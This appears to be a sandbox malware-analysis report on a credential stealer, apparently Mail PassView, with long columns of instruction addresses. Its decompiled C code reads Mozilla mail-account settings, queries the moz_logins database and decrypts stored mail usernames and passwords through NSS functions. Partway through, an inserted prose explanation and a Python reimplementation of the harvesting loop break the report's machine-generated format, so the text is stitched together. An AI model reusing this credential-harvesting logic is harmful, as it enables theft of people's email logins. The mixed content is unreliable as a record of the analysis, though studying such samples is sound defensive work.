                                                  0x0040ca03
                                                  0x0040ca08
                                                  0x0040ca0b
                                                  0x0040ca14
                                                  0x0040ca19
                                                  0x0040ca1c
                                                  0x0040ca21
                                                  0x0040ca14
                                                  0x0040ca22
                                                  0x0040ca27
                                                  0x0040ca2a
                                                  0x0040ca33
                                                  0x0040ca35
                                                  0x0040ca38
                                                  0x0040ca3e
                                                  0x0040ca45
                                                  0x0040ca54
                                                  0x0040ca5f
                                                  0x0040ca70
                                                  0x0040ca61
                                                  0x0040ca67
                                                  0x0040ca6d
                                                  0x0040ca5f
                                                  0x0040ca7a

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C7F4
                                                  • strlen.MSVCRT ref: 0040C7FF
                                                  • strncmp.MSVCRT(?,mail.account.account,00000000,mail.account.account,?,00000000,000000FF), ref: 0040C80C
                                                  • _stricmp.MSVCRT(00000000,server), ref: 0040C849
                                                  • _stricmp.MSVCRT(00000000,identities), ref: 0040C86B
                                                  • strlen.MSVCRT ref: 0040C88B
                                                  • strncmp.MSVCRT(?,mail.server,00000000,mail.server), ref: 0040C898
                                                  • _stricmp.MSVCRT(00000000,username,00000000), ref: 0040C8E1
                                                  • _stricmp.MSVCRT(00000000,type,00000000), ref: 0040C903
                                                  • _stricmp.MSVCRT(00000000,hostname,00000000), ref: 0040C925
                                                  • _stricmp.MSVCRT(00000000,port,00000000), ref: 0040C947
                                                  • atoi.MSVCRT ref: 0040C955
                                                    • Part of subcall function 0040C748: memset.MSVCRT ref: 0040C77E
                                                    • Part of subcall function 0040C748: memcpy.MSVCRT ref: 0040C7A0
                                                    • Part of subcall function 0040C748: atoi.MSVCRT ref: 0040C7B4
                                                  • _stricmp.MSVCRT(00000000,useSecAuth,00000000), ref: 0040C969
                                                  • _stricmp.MSVCRT(?,true,00000000), ref: 0040C97C
                                                  • strlen.MSVCRT ref: 0040C997
                                                  • strncmp.MSVCRT(?,mail.identity,00000000,mail.identity), ref: 0040C9A4
                                                  • _stricmp.MSVCRT(00000000,useremail,00000000), ref: 0040C9E9
                                                  • _stricmp.MSVCRT(00000000,fullname,00000000), ref: 0040CA0B
                                                  • _stricmp.MSVCRT(?,signon.signonfilename), ref: 0040CA2A
                                                  • strlen.MSVCRT ref: 0040CA45
                                                  • strlen.MSVCRT ref: 0040CA4F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp$strlen$strncmp$atoimemset$memcpy
                                                  • String ID: fullname$hostname$identities$mail.account.account$mail.identity$mail.server$port$server$signon.signonfilename$true$type$useSecAuth$useremail$username
                                                  • API String ID: 736090197-593045482
                                                  • Opcode ID: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                  • Instruction ID: 8e23c8f9271997a3be880b93158be8956f510041fead3e1da2e0ecaa9a645c54
                                                  • Opcode Fuzzy Hash: fa6975b133b13f5067aa23c0df6e7e68559b1782356a0831ed68d1fdd542dc29
                                                  • Instruction Fuzzy Hash: E271C972504204FADF10EB65CC42BDE77A6DF50329F20426BF506B21E1EB79AF819A5C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 98%
                                                  			E0040E4A4(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, signed int _a8, intOrPtr _a12, struct HDC__* _a16, long _a20, long _a24, intOrPtr _a28, signed int _a32, long _a36, intOrPtr _a40, struct tagPOINT _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, struct tagPOINT _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, char _a80, intOrPtr _a84, intOrPtr _a88, intOrPtr _a92, long _a96, struct tagPOINT _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, struct tagSIZE _a116, struct tagRECT _a124, intOrPtr _a128, intOrPtr _a136, char _a336) {
                                                  				signed int _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v8;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v20;
                                                  				signed int _v28;
                                                  				intOrPtr _v44;
                                                  				struct HWND__* _v48;
                                                  				struct HWND__* _v52;
                                                  				intOrPtr _v60;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				struct HDC__* _t169;
                                                  				struct HWND__* _t171;
                                                  				intOrPtr _t223;
                                                  				void* _t224;
                                                  				intOrPtr _t235;
                                                  				struct HWND__* _t237;
                                                  				void* _t240;
                                                  				intOrPtr* _t274;
                                                  				signed int _t275;
                                                  				signed int _t276;
                                                  
                                                  				_t274 = __esi;
                                                  				_t276 = _t275 & 0xfffffff8;
                                                  				E004118A0(0x2198, __ecx);
                                                  				_a12 =  *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b4));
                                                  				_t237 = GetDlgItem( *(__esi + 4), 0x3e9);
                                                  				_a4 = GetDlgItem( *(__esi + 4), 0x3e8);
                                                  				_a20 = GetWindowLongA(_t237, 0xfffffff0);
                                                  				_a24 = GetWindowLongA(_a4, 0xfffffff0);
                                                  				_a96 = GetWindowLongA(_t237, 0xffffffec);
                                                  				_a36 = GetWindowLongA(_a4, 0xffffffec);
                                                  				GetWindowRect(_t237,  &_a100);
                                                  				GetWindowRect(_a4,  &_a60);
                                                  				MapWindowPoints(0,  *(__esi + 4),  &_a100, 2);
                                                  				MapWindowPoints(0,  *(__esi + 4),  &_a60, 2);
                                                  				_t240 = _a108 - _a100.x;
                                                  				_a4 = _a4 & 0x00000000;
                                                  				_a28 = _a68 - _a60.x;
                                                  				_a76 = _a112 - _a104;
                                                  				_a40 = _a72 - _a64;
                                                  				_t169 = GetDC( *(__esi + 4));
                                                  				_a16 = _t169;
                                                  				if(_t169 == 0) {
                                                  					L9:
                                                  					_v0 = _v0 & 0x00000000;
                                                  					if( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)) <= 0) {
                                                  						L12:
                                                  						_t171 = GetDlgItem( *(_t274 + 4), 1);
                                                  						_a36 = _t171;
                                                  						GetWindowRect(_t171,  &_a44);
                                                  						MapWindowPoints(0,  *(_t274 + 4),  &_a44, 2);
                                                  						GetClientRect( *(_t274 + 4),  &_a124);
                                                  						GetWindowRect( *(_t274 + 4),  &_a80);
                                                  						SetWindowPos( *(_t274 + 4), 0, 0, 0, _a88 - _a80 + 1, _a128 - _a136 - _a48 - _a84 + _a56 + _a92 + _a4 + 0x15, 0x206);
                                                  						GetClientRect( *(_t274 + 4),  &_a80);
                                                  						return SetWindowPos(_a36, 0, _a44.x, _a48 - _a56 - _a84 + _a92 - 5, _a52 - _a44 + 1, _a56 - _a48 + 1, 0x204);
                                                  					}
                                                  					_a20 = _a20 | 0x10000000;
                                                  					_a24 = _a24 | 0x10000000;
                                                  					_a8 = _a12 + 0x10;
                                                  					do {
                                                  						 *((intOrPtr*)( *_t274 + 0x1c))(_v0);
                                                  						_v20 = E00401562(_t274, _a92, "STATIC", _a16, _a96, _v0 + _a100.x, _t240, _a72);
                                                  						_v44 = E00401562(_t274, _a4, "EDIT", _v8, _a28, _v28 + _a32, _v4,  *(_t274 + 0x14) * _a8);
                                                  						sprintf( &_a80, "%s:", _v52->i);
                                                  						_t276 = _t276 + 0xc;
                                                  						SetWindowTextA(_v48,  &_a80);
                                                  						SetWindowTextA(_v52,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t274 + 0xc))))))(_v60,  &_a336));
                                                  						_v60 = _v60 + 0x14;
                                                  						_v64 = _v64 +  *(_t274 + 0x14) * _v28 +  *((intOrPtr*)(_t274 + 0x18));
                                                  						_v68 = _v68 + 1;
                                                  					} while (_v68 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                  					goto L12;
                                                  				}
                                                  				_t223 = 0;
                                                  				_a32 = _a32 & 0;
                                                  				_a8 = 0;
                                                  				if( *((intOrPtr*)( *((intOrPtr*)(__esi + 0x10)) + 0x1b0)) <= 0) {
                                                  					L8:
                                                  					_t224 = _t223 - _t240;
                                                  					_a28 = _a28 - _t224;
                                                  					_a60.x = _a60.x + _t224;
                                                  					_t240 = _t240 + _t224;
                                                  					ReleaseDC( *(_t274 + 4), _a16);
                                                  					goto L9;
                                                  				}
                                                  				_v0 = _a12 + 0x10;
                                                  				do {
                                                  					if(GetTextExtentPoint32A(_a16,  *_v0, strlen( *_v0),  &_a116) != 0) {
                                                  						_t235 = _a100.x + 0xa;
                                                  						if(_t235 > _v8) {
                                                  							_v8 = _t235;
                                                  						}
                                                  					}
                                                  					_a16 =  &(_a16->i);
                                                  					_v16 = _v16 + 0x14;
                                                  				} while (_a16 <  *((intOrPtr*)( *((intOrPtr*)(_t274 + 0x10)) + 0x1b0)));
                                                  				_t223 = _v8;
                                                  				goto L8;
                                                  			}

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                                  • String ID: %s:$EDIT$STATIC
                                                  • API String ID: 1703216249-3046471546
                                                  • Opcode ID: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                  • Instruction ID: 2f6da9a5868e125b8128a3bf626dfa5428397bb468519cd7ccc35e9b597c58da
                                                  • Opcode Fuzzy Hash: 63f961038f13364f7976eadaedf26f00b3f2f6ee041d7cedeb7d286e156d3b6f
                                                  • Instruction Fuzzy Hash: C9B1DE71108341AFD710DFA8C985A6BBBE9FF88704F008A2DF699D2260D775E814CF16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 84%
                                                  			E004010E5(void* __ecx, void* __edx, intOrPtr _a4, struct HDC__* _a8, unsigned int _a12) {
                                                  				struct tagPOINT _v12;
                                                  				void* __esi;
                                                  				void* _t47;
                                                  				struct HBRUSH__* _t56;
                                                  				void* _t61;
                                                  				unsigned int _t62;
                                                  				void* _t67;
                                                  				struct HWND__* _t68;
                                                  				struct HWND__* _t69;
                                                  				void* _t72;
                                                  				unsigned int _t73;
                                                  				struct HWND__* _t75;
                                                  				struct HWND__* _t76;
                                                  				struct HWND__* _t77;
                                                  				struct HWND__* _t78;
                                                  				unsigned int _t83;
                                                  				struct HWND__* _t85;
                                                  				struct HWND__* _t87;
                                                  				struct HWND__* _t88;
                                                  				struct tagPOINT _t94;
                                                  				struct tagPOINT _t96;
                                                  				void* _t102;
                                                  				void* _t113;
                                                  
                                                  				_t102 = __edx;
                                                  				_push(__ecx);
                                                  				_push(__ecx);
                                                  				_t47 = _a4 - 0x110;
                                                  				_t113 = __ecx;
                                                  				if(_t47 == 0) {
                                                  					__eflags =  *0x417348;
                                                  					if(__eflags != 0) {
                                                  						SetDlgItemTextA( *(__ecx + 4), 0x3ee, 0x417348);
                                                  					} else {
                                                  						ShowWindow(GetDlgItem( *(__ecx + 4), 0x3ed), 0);
                                                  						ShowWindow(GetDlgItem( *(_t113 + 4), 0x3ee), 0);
                                                  					}
                                                  					SetWindowTextA( *(_t113 + 4), "Mail PassView");
                                                  					SetDlgItemTextA( *(_t113 + 4), 0x3ea, _t113 + 0xc);
                                                  					SetDlgItemTextA( *(_t113 + 4), 0x3ec, _t113 + 0x10b);
                                                  					E00401085(_t113, __eflags);
                                                  					E00406491(_t102,  *(_t113 + 4));
                                                  					goto L29;
                                                  				} else {
                                                  					_t61 = _t47 - 1;
                                                  					if(_t61 == 0) {
                                                  						_t62 = _a8;
                                                  						__eflags = _t62 - 1;
                                                  						if(_t62 != 1) {
                                                  							goto L29;
                                                  						} else {
                                                  							__eflags = _t62 >> 0x10;
                                                  							if(_t62 >> 0x10 != 0) {
                                                  								goto L29;
                                                  							} else {
                                                  								EndDialog( *(__ecx + 4), 1);
                                                  								DeleteObject( *(_t113 + 0x20c));
                                                  								goto L8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t67 = _t61 - 0x27;
                                                  						if(_t67 == 0) {
                                                  							_t68 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                  							__eflags = _a12 - _t68;
                                                  							if(_a12 != _t68) {
                                                  								__eflags =  *0x417388;
                                                  								if( *0x417388 == 0) {
                                                  									goto L29;
                                                  								} else {
                                                  									_t69 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                  									__eflags = _a12 - _t69;
                                                  									if(_a12 != _t69) {
                                                  										goto L29;
                                                  									} else {
                                                  										goto L18;
                                                  									}
                                                  								}
                                                  							} else {
                                                  								L18:
                                                  								SetBkMode(_a8, 1);
                                                  								SetTextColor(_a8, 0xc00000);
                                                  								_t56 = GetSysColorBrush(0xf);
                                                  							}
                                                  						} else {
                                                  							_t72 = _t67 - 0xc8;
                                                  							if(_t72 == 0) {
                                                  								_t73 = _a12;
                                                  								_t94 = _t73 & 0x0000ffff;
                                                  								_v12.x = _t94;
                                                  								_v12.y = _t73 >> 0x10;
                                                  								_t75 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                  								_push(_v12.y);
                                                  								_a8 = _t75;
                                                  								_t76 = ChildWindowFromPoint( *(_t113 + 4), _t94);
                                                  								__eflags = _t76 - _a8;
                                                  								if(_t76 != _a8) {
                                                  									__eflags =  *0x417388;
                                                  									if( *0x417388 == 0) {
                                                  										goto L29;
                                                  									} else {
                                                  										_t77 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                  										_push(_v12.y);
                                                  										_t78 = ChildWindowFromPoint( *(_t113 + 4), _v12.x);
                                                  										__eflags = _t78 - _t77;
                                                  										if(_t78 != _t77) {
                                                  											goto L29;
                                                  										} else {
                                                  											goto L13;
                                                  										}
                                                  									}
                                                  								} else {
                                                  									L13:
                                                  									SetCursor(LoadCursorA( *0x416b94, 0x67));
                                                  									goto L8;
                                                  								}
                                                  							} else {
                                                  								if(_t72 != 0) {
                                                  									L29:
                                                  									_t56 = 0;
                                                  									__eflags = 0;
                                                  								} else {
                                                  									_t83 = _a12;
                                                  									_t96 = _t83 & 0x0000ffff;
                                                  									_v12.x = _t96;
                                                  									_v12.y = _t83 >> 0x10;
                                                  									_t85 = GetDlgItem( *(__ecx + 4), 0x3ec);
                                                  									_push(_v12.y);
                                                  									_a8 = _t85;
                                                  									if(ChildWindowFromPoint( *(_t113 + 4), _t96) != _a8) {
                                                  										__eflags =  *0x417388;
                                                  										if( *0x417388 == 0) {
                                                  											goto L29;
                                                  										} else {
                                                  											_t87 = GetDlgItem( *(_t113 + 4), 0x3ee);
                                                  											_push(_v12.y);
                                                  											_t88 = ChildWindowFromPoint( *(_t113 + 4), _v12);
                                                  											__eflags = _t88 - _t87;
                                                  											if(_t88 != _t87) {
                                                  												goto L29;
                                                  											} else {
                                                  												_push(0x417388);
                                                  												goto L7;
                                                  											}
                                                  										}
                                                  									} else {
                                                  										_push(_t113 + 0x10b);
                                                  										L7:
                                                  										_push( *(_t113 + 4));
                                                  										E00406523();
                                                  										L8:
                                                  										_t56 = 1;
                                                  									}
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t56;
                                                  			}
Instruction addresses for the routine above (0x004010e5 to 0x00401341; the report lists one address per decompiled line, but the column-to-line alignment was lost in extraction).

Memory Dump Source
• Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp
Similarity
• API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObject
• String ID: Mail PassView
• API String ID: 3628558512-272225179
• Opcode ID: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
• Instruction ID: a5e01e197ecdabf9e6bdb75eaf1794657044b10619e6b9182d208ef804a260cb
• Opcode Fuzzy Hash: 8369354600cb7b80dd2c736e043661f8d54616cc87117d1ac6397b61caa72165
• Instruction Fuzzy Hash: 68518130044248BFEB259F60DE85EAE7BB5EB04700F10853AFA56E65F0C7759D61EB08
Uniqueness
• Uniqueness Score: -1.00%

                                                  C-Code - Quality: 73%
                                                  			E0040CE28(void* __ecx, void* __eflags, intOrPtr _a4, char* _a8) {
                                                  				char* _v8;
                                                  				int _v12;
                                                  				char* _v16;
                                                  				char* _v20;
                                                  				char* _v24;
                                                  				int* _v28;
                                                  				char* _v32;
                                                  				int _v36;
                                                  				intOrPtr _v44;
                                                  				intOrPtr _v48;
                                                  				intOrPtr _v64;
                                                  				intOrPtr _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				void _v331;
                                                  				int _v332;
                                                  				void _v587;
                                                  				int _v588;
                                                  				void _v851;
                                                  				char _v852;
                                                  				void _v1378;
                                                  				short _v1380;
                                                  				void _v1995;
                                                  				char _v1996;
                                                  				void _v2611;
                                                  				char _v2612;
                                                  				char _v3636;
                                                  				char _v4660;
                                                  				char _v5684;
                                                  				char _v6708;
                                                  				char _v7732;
                                                  				void _v8755;
                                                  				char _v8756;
                                                  				void* __ebx;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				signed int _t115;
                                                  				signed int _t116;
                                                  				int _t118;
                                                  				void* _t130;
                                                  				char* _t170;
                                                  				intOrPtr _t175;
                                                  				char* _t177;
                                                  				int _t196;
                                                  				intOrPtr _t226;
                                                  				void* _t229;
                                                  				int* _t232;
                                                  				char* _t235;
                                                  				void* _t237;
                                                  				void* _t238;
                                                  				void* _t239;
                                                  				void* _t240;
                                                  
                                                  				E004118A0(0x2234, __ecx);
                                                  				_t226 = _a4;
                                                  				_t232 = _t226 + 0x30;
                                                  				_v28 = _t232;
                                                  				_t115 = E0040DEEE(_t232, _t226 + 0x362);
                                                  				if(_t115 == 0) {
                                                  					L43:
                                                  					return _t115;
                                                  				}
                                                  				_t116 = _t232[1];
                                                  				_t196 = 0;
                                                  				if(_t116 == 0) {
                                                  					_t115 = _t116 | 0xffffffff;
                                                  				} else {
                                                  					_t115 =  *_t116(_t226 + 0x158);
                                                  				}
                                                  				if(_t115 != _t196) {
                                                  					L41:
                                                  					if( *_t232 == _t196) {
                                                  						goto L43;
                                                  					}
                                                  					_t118 = SetCurrentDirectoryA( &(_t232[8]));
                                                  					 *_t232 = _t196;
                                                  					return _t118;
                                                  				} else {
                                                  					_v36 = _t196;
                                                  					if(E0040F64B( &_v72, _t226 + 0x362) == 0) {
                                                  						L39:
                                                  						_t232 = _v28;
                                                  						_t115 = _t232[2];
                                                  						if(_t115 != _t196) {
                                                  							_t115 =  *_t115();
                                                  						}
                                                  						goto L41;
                                                  					} else {
                                                  						_v12 = _t196;
                                                  						_v1380 = _t196;
                                                  						memset( &_v1378, _t196, 0x208);
                                                  						_v852 = _t196;
                                                  						memset( &_v851, _t196, 0x104);
                                                  						_t239 = _t238 + 0x18;
                                                  						MultiByteToWideChar(_t196, _t196, _a8, 0xffffffff,  &_v1380, 0x104);
                                                  						WideCharToMultiByte(0xfde9, _t196,  &_v1380, 0xffffffff,  &_v852, 0x104, _t196, _t196);
                                                  						if(_v72 != _t196) {
                                                  							_v72( &_v852,  &_v12);
                                                  						}
                                                  						if(_v12 == _t196) {
                                                  							goto L39;
                                                  						}
                                                  						_a8 = _t196;
                                                  						if(_v68 != _t196) {
                                                  							_v68(_v12, "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins", 0xffffffff,  &_a8,  &_v76);
                                                  							_t239 = _t239 + 0x14;
                                                  						}
                                                  						L11:
                                                  						L11:
                                                  						if(_v64 == _t196) {
                                                  							_t130 = 0xffff;
                                                  						} else {
                                                  							_t130 = _v64(_a8);
                                                  						}
                                                  						if(_t130 != 0x64) {
                                                  							goto L34;
                                                  						}
                                                  						_v8756 = _t196;
                                                  						memset( &_v8755, _t196, 0x3ff);
                                                  						memset( &_v7732, _t196, 0x1400);
                                                  						_t240 = _t239 + 0x18;
                                                  						_t235 = E0040F7EE( &_v72, _a8, 1);
                                                  						_v20 = E0040F7EE( &_v72, _a8, 6);
                                                  						_v8 = E0040F7EE( &_v72, _a8, 7);
                                                  						_v24 = E0040F7EE( &_v72, _a8, 4);
                                                  						_v32 = E0040F7EE( &_v72, _a8, 5);
                                                  						_v16 = E0040F7EE( &_v72, _a8, 2);
                                                  						if(_t235 != _t196) {
                                                  							strcpy( &_v8756, _t235);
                                                  						}
                                                  						if(_v20 != _t196) {
                                                  							strcpy( &_v7732, _v20);
                                                  						}
                                                  						if(_v8 != _t196) {
                                                  							strcpy( &_v6708, _v8);
                                                  						}
                                                  						if(_v24 != _t196) {
                                                  							strcpy( &_v5684, _v24);
                                                  						}
                                                  						if(_v32 != _t196) {
                                                  							strcpy( &_v4660, _v32);
                                                  						}
                                                  						if(_v16 != _t196) {
                                                  							strcpy( &_v3636, _v16);
                                                  						}
                                                  						_v332 = _t196;
                                                  						memset( &_v331, _t196, 0xff);
                                                  						_v588 = _t196;
                                                  						memset( &_v587, _t196, 0xff);
                                                  						_t239 = _t240 + 0x18;
                                                  						E0040CD27(_v8, _t226,  &_v588);
                                                  						E0040CD27(_v20, _t226,  &_v332);
                                                  						_v8 = _t196;
                                                  						if( *((intOrPtr*)(_t226 + 0x474)) > _t196) {
                                                  							_v16 = _t226 + 0x468;
                                                  							do {
                                                  								_t237 = E0040D438(_v8, _v16);
                                                  								_v2612 = _t196;
                                                  								memset( &_v2611, _t196, 0x261);
                                                  								_v1996 = _t196;
                                                  								memset( &_v1995, _t196, 0x261);
                                                  								_t86 = _t237 + 0x104; // 0x104
                                                  								_t229 = _t86;
                                                  								sprintf( &_v2612, "mailbox://%s", _t229);
                                                  								sprintf( &_v1996, "imap://%s", _t229);
                                                  								_push( &_v3636);
                                                  								_t170 =  &_v2612;
                                                  								_push(_t170);
                                                  								L004115B2();
                                                  								_t239 = _t239 + 0x38;
                                                  								if(_t170 == 0) {
                                                  									L31:
                                                  									_t94 = _t237 + 0x304; // 0x304
                                                  									E004060D0(0xff, _t94,  &_v588);
                                                  									_t96 = _t237 + 0x204; // 0x204
                                                  									E004060D0(0xff, _t96,  &_v332);
                                                  									_t196 = 0;
                                                  									goto L32;
                                                  								}
                                                  								_push( &_v3636);
                                                  								_t177 =  &_v1996;
                                                  								_push(_t177);
                                                  								L004115B2();
                                                  								if(_t177 != 0) {
                                                  									goto L32;
                                                  								}
                                                  								goto L31;
                                                  								L32:
                                                  								_v8 =  &(_v8[1]);
                                                  								_t175 = _a4;
                                                  							} while (_v8 <  *((intOrPtr*)(_t175 + 0x474)));
                                                  							_t226 = _t175;
                                                  						}
                                                  						goto L11;
                                                  						L34:
                                                  						if(_a8 != _t196 && _v48 != _t196) {
                                                  							_v48(_a8);
                                                  						}
                                                  						if(_v44 != _t196) {
                                                  							_v44(_v12);
                                                  						}
                                                  						goto L39;
                                                  					}
                                                  				}
                                                  			}
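The routine E0040CE28 above is the Mozilla-store harvesting step of the embedded Mail PassView component: it converts the profile path to UTF-8, opens the login database through function pointers resolved at runtime, runs the `SELECT ... FROM moz_logins` query verbatim, walks rows while the step call returns 0x64 (SQLITE_ROW is 100), copies columns 1, 2, 4, 5, 6 and 7 into fixed buffers, and then, for every configured mail account, formats `mailbox://<server>` and `imap://<server>` and compares each against the httpRealm column before storing the decrypted username and password into the account record. The Python below is an added illustration of that selection logic, not code from the report or from the sample; it runs against a constructed in-memory table. Assumptions: the pointers in _v72/_v68/_v64/_v48/_v44 are sqlite3 open/prepare/step/finalize/close, E0040CD27 is a decryption routine (replaced here by a labelled placeholder, since the report does not show its body), and the two-argument L004115B2 is a string comparison returning 0 on equality.

```python
import sqlite3

# Query string copied verbatim from the decompiled routine E0040CE28.
MOZ_LOGINS_QUERY = (
    "SELECT id, hostname, httpRealm, formSubmitURL, usernameField, "
    "passwordField, encryptedUsername, encryptedPassword FROM moz_logins"
)


def build_sample_db():
    """Constructed stand-in for a Thunderbird/Firefox signons.sqlite (not a real capture)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        """CREATE TABLE moz_logins (
               id INTEGER PRIMARY KEY, hostname TEXT, httpRealm TEXT,
               formSubmitURL TEXT, usernameField TEXT, passwordField TEXT,
               encryptedUsername TEXT, encryptedPassword TEXT)"""
    )
    rows = [  # constructed rows; ENC(...) marks a stand-in for the NSS-encrypted blob
        (1, "imap://mail.example.test", "imap://mail.example.test", None, "", "", "ENC(alice)", "ENC(pw1)"),
        (2, "mailbox://pop.example.test", "mailbox://pop.example.test", None, "", "", "ENC(bob)", "ENC(pw2)"),
        (3, "https://webmail.example.test", None, "https://webmail.example.test/login", "user", "pass", "ENC(carol)", "ENC(pw3)"),
        (4, "smtp://smtp.example.test", "smtp://smtp.example.test", None, "", "", "ENC(dave)", "ENC(pw4)"),
    ]
    con.executemany("INSERT INTO moz_logins VALUES (?,?,?,?,?,?,?,?)", rows)
    return con


def placeholder_decrypt(blob):
    """Stands in for E0040CD27 (assumed to be decryption; the real routine is not reproduced)."""
    if blob and blob.startswith("ENC(") and blob.endswith(")"):
        return blob[4:-1]
    return blob


def harvest_mail_logins(con, account_servers):
    """Mirror the control flow of E0040CE28.

    For each moz_logins row (the native loop runs while step() == 0x64, SQLITE_ROW),
    take hostname (col 1), httpRealm (col 2), encryptedUsername (col 6) and
    encryptedPassword (col 7). For each configured account server build
    'mailbox://<server>' and 'imap://<server>' and accept the row when either
    equals httpRealm; the mailbox:// form is tried first, as in the binary.
    """
    matches = []
    for row in con.execute(MOZ_LOGINS_QUERY):
        http_realm = row[2]
        user = placeholder_decrypt(row[6])
        password = placeholder_decrypt(row[7])
        for server in account_servers:
            for candidate in ("mailbox://%s" % server, "imap://%s" % server):
                if http_realm is not None and candidate == http_realm:
                    matches.append({"server": server, "realm": http_realm,
                                    "user": user, "password": password})
                    break  # first matching scheme wins, then move to the next account
    return matches


if __name__ == "__main__":
    db = build_sample_db()
    for hit in harvest_mail_logins(db, ["mail.example.test", "pop.example.test", "smtp.example.test"]):
        print(hit)
```

Running it against the constructed table yields only the imap:// and mailbox:// rows; the web-form login (no httpRealm) and the smtp:// realm are skipped, which is exactly the scope the two sprintf format strings in the decompiled loop impose.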

Instruction addresses for E0040CE28 (from 0x0040ce30; the report lists one address per decompiled line, but the column-to-line alignment was lost in extraction).
                                                  0x0040d009
                                                  0x0040d00d
                                                  0x0040d019
                                                  0x0040d01f
                                                  0x0040d023
                                                  0x0040d02f
                                                  0x0040d035
                                                  0x0040d039
                                                  0x0040d045
                                                  0x0040d04b
                                                  0x0040d04f
                                                  0x0040d05b
                                                  0x0040d061
                                                  0x0040d070
                                                  0x0040d076
                                                  0x0040d084
                                                  0x0040d08a
                                                  0x0040d08f
                                                  0x0040d09e
                                                  0x0040d0af
                                                  0x0040d0ba
                                                  0x0040d0bd
                                                  0x0040d0c9
                                                  0x0040d0cc
                                                  0x0040d0dd
                                                  0x0040d0e7
                                                  0x0040d0ed
                                                  0x0040d0fb
                                                  0x0040d101
                                                  0x0040d106
                                                  0x0040d106
                                                  0x0040d119
                                                  0x0040d12b
                                                  0x0040d136
                                                  0x0040d137
                                                  0x0040d13d
                                                  0x0040d13e
                                                  0x0040d143
                                                  0x0040d148
                                                  0x0040d163
                                                  0x0040d16a
                                                  0x0040d175
                                                  0x0040d181
                                                  0x0040d187
                                                  0x0040d18e
                                                  0x00000000
                                                  0x0040d18e
                                                  0x0040d150
                                                  0x0040d151
                                                  0x0040d157
                                                  0x0040d158
                                                  0x0040d161
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0040d190
                                                  0x0040d190
                                                  0x0040d193
                                                  0x0040d199
                                                  0x0040d1a5
                                                  0x0040d1a5
                                                  0x00000000
                                                  0x0040d1ac
                                                  0x0040d1af
                                                  0x0040d1b9
                                                  0x0040d1bc
                                                  0x0040d1c0
                                                  0x0040d1c5
                                                  0x0040d1c8
                                                  0x00000000
                                                  0x0040d1c0
                                                  0x0040ce89

                                                  APIs
                                                    • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF0F
                                                    • Part of subcall function 0040DEEE: GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,00000000), ref: 0040DF3E
                                                    • Part of subcall function 0040DEEE: SetCurrentDirectoryA.KERNEL32(00000000,?,?,00000000), ref: 0040DF4B
                                                    • Part of subcall function 0040DEEE: memset.MSVCRT ref: 0040DF62
                                                    • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF6C
                                                    • Part of subcall function 0040DEEE: strlen.MSVCRT ref: 0040DF7A
                                                    • Part of subcall function 0040DEEE: GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 0040DFB3
                                                    • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFCF
                                                    • Part of subcall function 0040DEEE: LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,?,?,?,?,?,00000000), ref: 0040DFE7
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040DFFC
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040E008
                                                    • Part of subcall function 0040DEEE: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040E014
